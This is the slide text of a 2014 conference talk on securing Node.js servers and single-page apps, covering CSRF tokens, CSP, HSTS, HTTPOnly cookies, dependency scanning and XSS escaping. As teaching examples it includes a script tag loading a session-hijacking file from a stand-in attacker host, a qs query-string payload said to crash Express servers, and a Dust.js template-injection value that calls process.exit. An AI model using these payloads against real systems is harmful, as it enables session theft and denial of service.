Midwest JS 2014 - Securing your Node.js & Single Page Apps - Speaker Deck

Tweet

Tweet

Slide 1

Slide 1 text

Securing Your Node.js & Single Page Apps

Slide 2

Slide 2 text

bit.ly/jssecurity

Slide 3

Slide 3 text

@mark_stuart @mstuart

Slide 4

Slide 4 text

How are you using JavaScript?

Slide 5

Slide 5 text

So, why security?

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

No content

Slide 9

Slide 9 text

Not just PayPal, but your company too.

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

The scoop on security

Slide 14

Slide 14 text

Same vulnerabilities. Nothing new.

Slide 15

Slide 15 text

ok cya.

Slide 16

Slide 16 text

Same vulnerabilities. Different beast.

Slide 17

Slide 17 text

Node

Slide 18

Slide 18 text

Know what you require() Rule #1 ! ! !

Slide 19

Slide 19 text

npm has ~80,000 modules

Slide 20

Slide 20 text

modulecounts.com

Slide 21

Slide 21 text

Really great developer ecosystem, except…

Slide 22

Slide 22 text

Anyone can publish anything

Slide 23

Slide 23 text

Node is still JavaScript ! ! ! Rule #2

Slide 24

Slide 24 text

Client-side vulnerabilities still exist on the server-side

Slide 25

Slide 25 text

Eval is still evil

Slide 26

Slide 26 text

Do not run as root ! ! ! Rule #3

Slide 27

Slide 27 text

Running as root is wreckless

Slide 28

Slide 28 text

If you’re compromised, terrible things could happen

Slide 29

Slide 29 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 30

Slide 30 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 31

Slide 31 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 32

Slide 32 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 33

Slide 33 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 34

Slide 34 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 35

Slide 35 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 36

Slide 36 text

Steal SSH keys or conﬁgs Read/write ﬁles Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 37

Slide 37 text

Ok, so if not root, then what?

Slide 38

Slide 38 text

Create a user for node with restricted permissions ! (plenty of docs out there)

Slide 39

Slide 39 text

Create a user for node with restricted permissions ! (plenty of docs out there)

Slide 40

Slide 40 text

Create a user for node with restricted permissions ! (plenty of docs out there)

Slide 41

Slide 41 text

Use good security defaults ! ! ! Rule #4

Slide 42

Slide 42 text

Node is a set of barebones modules

Slide 43

Slide 43 text

HTTP OS DNS TLS/SSL Path Process UDP URL File System Crypto Buffer

Slide 44

Slide 44 text

Express is a barebones framework

Slide 45

Slide 45 text

Express does very little to secure your app

Slide 46

Slide 46 text

But, that’s okay!

Slide 47

Slide 47 text

… drum roll …

Slide 48

Slide 48 text

No content

Slide 49

Slide 49 text

Enterprise-grade Express "

Slide 50

Slide 50 text

Lusca App Security module for Express

Slide 51

Slide 51 text

var express = require(‘express’), app = express(), lusca = require(‘lusca’);

Slide 52

Slide 52 text

app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 }); app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

Slide 53

Slide 53 text

Pardon the interruption

Slide 54

Slide 54 text

CSRF

Slide 55

Slide 55 text

Trick victim’s browser into making malicious requests CSRF

Slide 56

Slide 56 text

All you need is a valid cookie CSRF

Slide 57

Slide 57 text

# User yoursite.com " Cookie CSRF

Slide 58

Slide 58 text

CSRF # User hackedsite.com Cookie

Slide 59

Slide 59 text

! document.forms.someHiddenForm.submit(); CSRF

Slide 60

Slide 60 text

# User hackedsite.com Cookie yoursite.com CSRF POST /transferFunds

Slide 61

Slide 61 text

It’s a simple HTTP request. CSRF

Slide 62

Slide 62 text

If only we had a way to ensure requests were legitimate… CSRF

Slide 63

Slide 63 text

lusca.csrf();

Slide 64

Slide 64 text

Token synchronizer pattern lusca.csrf();

Slide 65

Slide 65 text

1. Creates a random token (using some crazy crypto libraries) lusca.csrf();

Slide 66

Slide 66 text

2. Adds token to res.locals lusca.csrf();

Slide 67

Slide 67 text

3. Dump token on the page lusca.csrf();

Slide 68

Slide 68 text

4. Send token with every POST, PUT, DELETE request lusca.csrf();

Slide 69

Slide 69 text

$.ajaxPreﬁlter(function(options, _, xhr) { if (!xhr.crossDomain) { xhr.setRequestHeader('X-CSRF-Token', csrfToken); } }); lusca.csrf();

Slide 70

Slide 70 text

5. Verify token is correct, otherwise return 403. lusca.csrf();

Slide 71

Slide 71 text

CSP

Slide 72

Slide 72 text

CSP is really awesome.

Slide 73

Slide 73 text

It’s basically a whitelist.

Slide 74

Slide 74 text

Content-Security-Policy: default-src 'self' https://*.your-cdn.com; script-src 'self' https://*.your-cdn.com; img-src https://*.your-cdn.com data:; object-src 'self'; font-src 'self' https://*.googlefonts.com; connect-src … frame-src … style-src … media-src …

Slide 75

Slide 75 text

No content

Slide 76

Slide 76 text

lusca.csp( { /* … */ } );

Slide 77

Slide 77 text

lusca.csp({ "default-src": "'self' https://*.your-cdn.com”, "script-src": “'self' https://*.your-cdn.com”, "img-src": “https://*.your-cdn.com data:”, "font-src": “‘self’", “report-uri”: “https://mysite.com/cspReporter” });

Slide 78

Slide 78 text

“report-uri”: “https://mysite.com/cspReporter”

Slide 79

Slide 79 text

lusca.hsts();

Slide 80

Slide 80 text

lusca.hsts(); Ensures HTTPS traffic

Slide 81

Slide 81 text

Helps prevent MITM attacks lusca.hsts();

Slide 82

Slide 82 text

lusca.xframe();

Slide 83

Slide 83 text

lusca.xframe(); Prevent others from loading your app in an iframe

Slide 84

Slide 84 text

No content

Slide 85

Slide 85 text

app.use(lusca.xssProtection()); app.use(lusca.p3p());

Slide 86

Slide 86 text

app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 }); app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

Slide 87

Slide 87 text

Okay, now where were we?

Slide 88

Slide 88 text

HTTPOnly cookies

Slide 89

Slide 89 text

Prevents session hijacking HTTPOnly cookies

Slide 90

Slide 90 text

app.use(express.session({ secret: ‘0m6!s3cr37’, cookie: { httpOnly: true, secure: true }, })); HTTPOnly cookies

Slide 91

Slide 91 text

Set-Cookie:! connect.sid=%3AbzLqvcp7DnQJMaLAPmJ7p; ! Path=/; Expires=Wed, 21 May 2014 18:26:44 GMT; HttpOnly HTTPOnly cookies

Slide 92

Slide 92 text

Handle errors, or crash. ! ! ! Rule #5

Slide 93

Slide 93 text

! Wed, 21 May 2014 18:49:00 GMT ! uncaughtException Object # has no method ‘forEach'! ! TypeError: Object # has no method 'forEach'! at module.exports.fetchSettings (/Users/marstuart/oddjob/helpers.js:174:18)! ! Process ﬁnished with exit code 1!

Slide 94

Slide 94 text

Basically, a DOS attack

Slide 95

Slide 95 text

Catch them or restart

Slide 96

Slide 96 text

Scan for vulnerable modules ! ! ! Rule #6

Slide 97

Slide 97 text

Node Security Project http://nodesecurity.io

Slide 98

Slide 98 text

Audit all modules in npm

Slide 99

Slide 99 text

Contribute patches

Slide 100

Slide 100 text

No content

Slide 101

Slide 101 text

Educate others

Slide 102

Slide 102 text

npm install grunt-nsp-package --save-dev grunt validate-package

Slide 103

Slide 103 text

No content

Slide 104

Slide 104 text

Deﬁne custom rules ESLint

Slide 105

Slide 105 text

Security can be automated

Slide 106

Slide 106 text

Make it a part of your CI

Slide 107

Slide 107 text

Update your dependencies ! ! ! Rule #7

Slide 108

Slide 108 text

August 6th, just 1 week ago..

Slide 109

Slide 109 text

DoS attack with qs

Slide 110

Slide 110 text

qs is a query string parser

Slide 111

Slide 111 text

qs.parse(‘a=c’); // { a: ‘c’ }

Slide 112

Slide 112 text

qs.parse(‘a=c’); // { a: ‘c’ } qs.parse(‘a[1]=c&a[0]=b’); // { a: [‘b’, ‘c’] }

Slide 113

Slide 113 text

qs.parse(‘foo[0][100000000]=ba’); ! FATAL ERROR: JS Allocation failed - process out of memory Abort trap: 6

Slide 114

Slide 114 text

qs is used by lots of popular modules

Slide 115

Slide 115 text

express hapi restify body-parser restler superagent

Slide 116

Slide 116 text

express hapi restify body-parser restler superagent

Slide 117

Slide 117 text

express hapi restify body-parser restler superagent

Slide 118

Slide 118 text

express hapi restify body-parser restler superagent

Slide 119

Slide 119 text

express hapi restify body-parser restler superagent

Slide 120

Slide 120 text

express hapi restify body-parser restler superagent

Slide 121

Slide 121 text

The problem is…

Slide 122

Slide 122 text

Most of us are using express

Slide 123

Slide 123 text

Just pass foo[0][100000000]=ba as your user agent

Slide 124

Slide 124 text

Or… pass foo[0][100000000]=ba as a query string param

Slide 125

Slide 125 text

And you can crash the server FATAL ERROR: JS Allocation failed - process out of memory

Slide 126

Slide 126 text

And you can crash the server FATAL ERROR: JS Allocation failed - process out of memory

Slide 127

Slide 127 text

Good news!

Slide 128

Slide 128 text

It’s been patched

Slide 129

Slide 129 text

Although you’re probably running an old version

Slide 130

Slide 130 text

Update your dependencies

Slide 131

Slide 131 text

Add a badge to your README

Slide 132

Slide 132 text

No content

Slide 133

Slide 133 text

No content

Slide 134

Slide 134 text

david-dm.org

Slide 135

Slide 135 text

Let’s recap…

Slide 136

Slide 136 text

1. Know what you require() 2. Node is still JavaScript 3. Do not run as root 3. Use good security defaults 4. Security can be automated, too!

Slide 137

Slide 137 text

Client-side JS

Slide 138

Slide 138 text

Escape everything. ! ! ! Rule #1

Slide 139

Slide 139 text

Content injection

Slide 140

Slide 140 text

XSS sucks. It’s everywhere.

Slide 141

Slide 141 text

<script src='http://hacker.com/ sessionhijacker.js'></script>

Slide 142

Slide 142 text

User input and backend data

Slide 143

Slide 143 text

Don’t trust backend services to escape properly

Slide 144

Slide 144 text

Persistent or Stored XSS

Slide 145

Slide 145 text

# Attacker yoursite.com PUT /account/edit { ﬁrstName: ‘…’ } # Victim # Victim <script>… GET /addressBook … GET /addressBook yoursite.com yoursite.com

Slide 146

Slide 146 text

Case Study: TweetDeck worm

Slide 147

Slide 147 text

TweetDeck worm

Slide 148

Slide 148 text

TweetDeck worm

Slide 149

Slide 149 text

Just one tweet. TweetDeck worm

Slide 150

Slide 150 text

Just two months ago. TweetDeck worm

Slide 151

Slide 151 text

… So how do I escape?

Slide 152

Slide 152 text

DOMPurify and Google Caja

Slide 153

Slide 153 text

DOMPurify Plain ol’ JavaScript var clean = DOMPurify.sanitize(dirty);

Slide 154

Slide 154 text

require(['dompurify'], function(DOMPurify) { var clean = DOMPurify.sanitize(dirty); }); RequireJS / AMD DOMPurify

Slide 155

Slide 155 text

Node? DOMPurify

Slide 156

Slide 156 text

Node? DOMPurify Coming soon!

Slide 157

Slide 157 text

Know your templating library. ! ! ! Rule #2

Slide 158

Slide 158 text

Use it properly.

Slide 159

Slide 159 text

Underscore templates

Slide 160

Slide 160 text

” /> ” />

Slide 161

Slide 161 text

Dust.js templates

Slide 162

Slide 162 text

{@if cond=“{cardType} === ‘VISA’”}

{/if}

Slide 163

Slide 163 text

{@if cond=“{zipCode} === {defaultZipCode}”}

{/if} { “zipCode”: “\\”, “defaultZipCode”: “);process.exit();//“ }

Slide 164

Slide 164 text

Your server crashed. $

Slide 165

Slide 165 text

Upgrade your front-end dependencies. ! ! ! Rule #3

Slide 166

Slide 166 text

Retire.js

Slide 167

Slide 167 text

jQuery <1.9.0 jQuery Mobile <1.0.1 Backbone <0.5.0 Angular <1.2.0 Handlebars <1.0.0 YUI <3.9.2 Ember <1.3.2 Mustache <0.3.1 easyXDM <2.4.19

Slide 168

Slide 168 text

Running "retire:jsPath" (retire) task! ! >> test-ﬁles/jquery-1.6.js! >> ↳ jquery 1.6 has known vulnerabilities: http://web.nvd.nist.gov/view/ vuln/detail?vulnId=CVE-2011-4969! ! >> Aborted due to warnings. npm install grunt-retire --save-dev grunt retire

Slide 169

Slide 169 text

Automate it!

Slide 170

Slide 170 text

C’mon, it’s 1 line.

Slide 171

Slide 171 text

Rules of Thumb

Slide 172

Slide 172 text

No matter what you do, someone will always ﬁnd a way in

Slide 173

Slide 173 text

But, you’ll get 80% there if you…

Slide 174

Slide 174 text

Choose libraries with good security defaults. ! ! !

Slide 175

Slide 175 text

Sanitize data coming in and going out. ! ! !

Slide 176

Slide 176 text

Update your dependencies! ! ! !

Slide 177

Slide 177 text

Automate security, too. ! ! !

Slide 178

Slide 178 text

Ok.

Slide 179

Slide 179 text

Ok. so,

Slide 180

Slide 180 text

Ok. so, listen…

Slide 181

Slide 181 text

Node is awesome.

Slide 182

Slide 182 text

It’s enterprise ready.

Slide 183

Slide 183 text

We just need to write better, more secure apps.

Slide 184

Slide 184 text

thanks!

Slide 185

Slide 185 text

We’re hiring!

Slide 186

Slide 186 text

mark stuart @mark_stuart @mstuart

Slide 187

Slide 187 text

Links https://github.com/nodesecurity/grunt-nsp-package https://github.com/bekk/grunt-retire https://nodesecurity.io/ https://github.com/evilpacket/helmet http://krakenjs.com/ https://github.com/krakenjs/lusca https://david-dm.org/ https://www.owasp.org/index.php/Cross-Site